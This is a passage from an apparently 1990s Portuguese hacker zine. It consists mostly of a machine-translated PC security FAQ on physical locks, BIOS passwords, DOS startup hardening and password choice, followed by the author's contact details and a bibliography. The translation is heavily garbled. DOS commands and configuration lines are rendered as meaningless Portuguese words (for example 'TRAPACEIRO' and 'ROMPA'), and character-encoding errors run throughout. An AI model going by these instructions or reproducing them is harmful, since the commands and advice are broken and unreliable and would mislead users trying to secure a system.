de consolo) e seleciona as opäes para instalar os Servios de Diret¢rio. Voc 
sido incitado para a contra-senha de Admin enquanto fazendo isto. Isso voc 
pode perseguir para qualquer estaÆo e pode anotar em como usu rio Admin, 
usando a contra-senha que voc selecionou. 

* *NOTE: Se Disco Edita  indispon¡vel, qualquer Disco que Edita utilidade com 
capacidades buscadoras bastarÆo. 

---------------------------------------------------------------- 


3. Construindo um sistema seguro 

3a. Entendendo os Assuntos 

Hackers " potencial " 
== == == == == == == == == = 
Depois de ler este FAQ, voc revisou sua idia provavelmente de um 
PC seguro bastante. Verdade contada, a IBM nÆo projetou o Computador Pessoal 
com segurana em mente. Atr s em 1980, o objetivo principal deles/delas era 
adquirir _something_ para comercializar antes de MaÆ engoliu toda a parte de 
mercado. 

Depois de por algum tempo, programas de segurana comearam a emergir isso 
tentado 
atravessar este buraco. Estes eram bastante populares, e foi posto em uso 
por muitas companhias prevenir ' os empregados de curious' de desarrumar com 
os computadores. 

Porm, modos para evitar estes foram achados programas de segurana depressa. 
Contanto que sejam projetados computadores para convenincia, e com humanos 
em mente, acontecer  quase sempre isto. 

Assim, quem sÆo Hackers " potencial "? A resposta : Qualquer um. Usu rios 
experientes especialmente, mas newbies plano s vezes acham manchas fracas. 
Isto 
 nÆo dizer que todo o mundo *is * um hacker. 

Como sempre, prevenÆo  o melhor medicamento. As seäes seguintes 
negocie com como afianar seu sistema, ambos por meios f¡sicos e 
software-baseados. 



Segurana f¡sica 
== == == == == == == == = 
Nos dias velhos, atr s quando computadores encheram quartos m£ltiplos, a 
segurana de um sistema era basicamente todo f¡sica: Fechaduras, segurana 
guarda, etc. Agora a nfase trocou longe de segurana f¡sica, e est  apoiando 
mais para mtodos software-baseados. Porm,  
em alguns casos, um certo grau de segurana f¡sica est  em ordem. 

* *If voc quer prevenir as pessoas de resetting seu CMOS e  
tendo acesso os passeios moles, etc. voc tem que afianar o pr¢prio sistema. 
Isto pode ser feito tendo o computador em um quarto fechado e pode ser deixado 
s¢ a tela e teclado acess¡vel. H  muitos produtos que o deixaram estendem o 
alcance de tela e cabos de teclado.  At mesmo alguns que o deixaram controlam 
muitos computadores diferentes que usam uma tela.  

* * *To protegem seus dados de disco r¡gido, eu sugestionaria investindo em um 
sistema de m¡dia remov¡vel que o " deixa quente-troca " e discos r¡gidos de 
fechadura.  O disco r¡gido poderia ser removido entÆo facilmente (com o *unique 
* chave) 
e armazenou em uma caixa forte para prevenir roubo de dados. 

* * *Computer fecha que liga seu computador a uma escrivaninha  bom para 
desencorajar roubo. 

* * *There tambm sÆo dispositivos de segurana dispon¡vel fez atravs de 
companhias como Bloco de ¶ncora, Lucasey, e outros que completamente incluem o 
PC.   
Estes sÆo dispositivos como blocos de lockdown, cabos para monitores, e caixas 
de metal. Tambm h  dispositivos que cobrem e fecham o disquete  
e aberturas de CD-ROM.   

Tenha certeza que voc testa o computador imediatamente depois destes 
sÆo instalados dispositivos de lockdown. Em algumas instncias induziu a tensÆo 
na cobertura certas partes podem causar a mau funcionamento. 

* * *You pode comprar dispositivos dos que previnem o PC corda eltrica  
unplugged sendo ou virou em sem uma chave. 

* * *As uma £ltima medida de segurana, sempre  agrad vel investir em 
um pouco de seguro para seu computador. NÆo voltar  seus dados, 
mas isto *will * lhe d um pouco de paz de mente. 


Segurana software-baseada 
== == == == == == == == == == == = 
Debaixo de  uma lista de medidas voc pode levar para afianar mtodos 
baseados para seu software/firmware usando de sistema. Eles sÆo listados em 
ordem de segurana crescente, segurana tÆo m¡nima estaria implementando s¢ 
opÆo #1, segurana de m ximo estaria implementando #1-8. Detenha 
mente que implementando quaisquer destes sem implementar todo artigo debaixo 
disto deixa para poss¡veis pontos de entrada abre. 

	1. Monte uma contra-senha de BIOS para ambos a tela de LigaÆo *and * 
	   tenha acesso ao sistema. 
		um. Tenha certeza a contra-senha nÆo  facilmente nenhum guessable 
			(i.e., birthdate, nomeie para tr s, etc.  
			 facilmente adivinhado) Veja pr¢xima seÆo. 
		b. Tenha certeza que a contra-senha  o m ximo poss¡vel 
			n£mero de car ter apoiado pelo BIOS. 
	2. Incapacite disquete que cala as botas em o BIOS de dentro 
	3. Incapacite Estrada de contorno de arquivos de startup 
		um. Isto  acabado somando a linha: 
			SWITCHES=/F /N 
		   para o arquivo de CONFIG.SYS. 
		b. Adicionalmente, voc poderia querer preceder 
			todas as declaraäes no Autoexec.bat 
			com CTTY NUL, e entÆo tem o TRAPACEIRO de CTTY 
			como a £ltima linha. Isto previne quebrando 
			fora de autoexec.bat 
		c. Se voc usa compressÆo de DriveSpace, some o 
			linha seguinte para seu arquivo de DRVSPACE.INI: 
			SWITCHES=/F /N 
		d. Some a linha: 
			ROMPA 
		   Isto reduz o n£mero de chances para o que voc tem 
		   fuja de AUTOEXEC.BAT, tudo entretanto nÆo faz 
		   apague completamente 
	4. Monte uma Segurana DOS-baseada TSR 
		um. Tenha certeza voc nÆo pode ter acesso o passeio mole 
			sem uma contra-senha, e que permite 
			para escrever-proteÆo. 
		b. Tenha certeza permite proteÆo de contra-senha. 
	5. Monte um programa de Segurana Windows-baseado 
		um. Tenha certeza voc pode controlar quais caracter¡sticas de 
			Windows voc pode limitar ou pode incapacitar. 
		b. Tenha certeza permite proteÆo de contra-senha. 
	6. Instale um programa de filesystem codificado. (i.e., CryptDisk) 
		um. Isto prevenir  acesso para o computador e 
			arquivos no disco r¡gido a menos que a contra-senha 
			 entrado. Far  seus dados  
			unaccessible igualam se o disco r¡gido   
			extra¡do do sistema. 
	7. Apague os arquivos seguintes: 
		FORMATO 
		DELTREE 
		SUBST 
		UNA 
		AUXILIO 
		RESTABELEA 
		ATTRIB 


Contra-senhas 
== == == == = 
Contra-senhas geralmente sÆo o v¡nculo mais fraco na cadeia de segurana. 
Quando escolhendo uma contra-senha, se lembre destas gorjetas: 

NÆo escolha algo ¢bvio. Jure palavras, seu birthdate, 
t¢picos que pertencem ao que voc faz and/or seus interesses sÆo  
exemplos de contra-senhas RUINS. 

Uma Contra-senha Boa  um que  totalmente fortuito. Escolher uma contra-senha, 
tente isto: Agarre um dicion rio. Feche seus olhos, e sacuda um  
p gina fortuita. Com seus olhos ainda fechados, vista seu dedo um  
mancha fortuita nesta p gina. Se lembre da palavra, e faa isto novamente.  
Combine as duas palavras, e junte um n£mero de trs-d¡gito para o fim.  
Voc tambm poderia querer entremear car ter non-alfanumricos  
na contra-senha de modos fortuitos, como uma colisÆo estranha ou  
ap¢strofe aqui e l . 

Tambm, NUNCA escreva sua contra-senha abaixo. Sempre mantenha em sua cabea. 
Um simples Posto-isto nota em seu monitor pode derrubar todos o 
segurana para cima a que voc fixou tÆo meticulosamente! 

Uma contra-senha boa couros de sistemas as contra-senhas de todo o mundo,  
inclusive os administradores de sistemas. Isto significa que o sys  
admins nÆo podem contar se os usu rios estÆo pondo em contra-senhas fracas. 

Uma nota final: Quando projetando um sistema de segurana, esteja seguro levar 
o usu rio em conta. Se um sistema  de tal segurana de alto-grau 
que  um nuisance para usar, as pessoas sempre acharÆo o preguioso  
modo para fazer isto. (Nota...) 

---------------------------------------------------------------- 

Como entrar em contato

	Chegamos ao fim da versÆo beta deste zine, eu gostaria de contar com a participaÆo de vocs, sejam crackers, phreakers, hackers ou at mesmo lammers esforados. Para mandar dicas mande um e-mail para mim com o subject dicas_zine. NÆo farei assinaturas, porque como j  tinha dito estou sem tempo. Mas voc encontrar  facilmente o n£mero atualizado do zine em minha HP, mesmo que a geocities me d um take down e a colocarei no ar de novo, em outro endereo, mas colocarei. Para contatos, dicas e outras coisas a¡ vai meu E-mail:

E-mail: dark_sided@geocities.com
Home Page: http://www.geocities.com/siliconvalley/peaks/2667/index.html 
(grande nÆo ?)

H , como eu j  ia me esquecendo, me perdoem qualquer erro de protugus. A bibliografia est  ai embaixo.

Zine nethack
Manual definitivo de violaÆo a telefones p£blicos e privados
Pc-FAQ

N¢s somos o poder,
nÆo poder sem conhecimento.

Cyber Cool.




















	











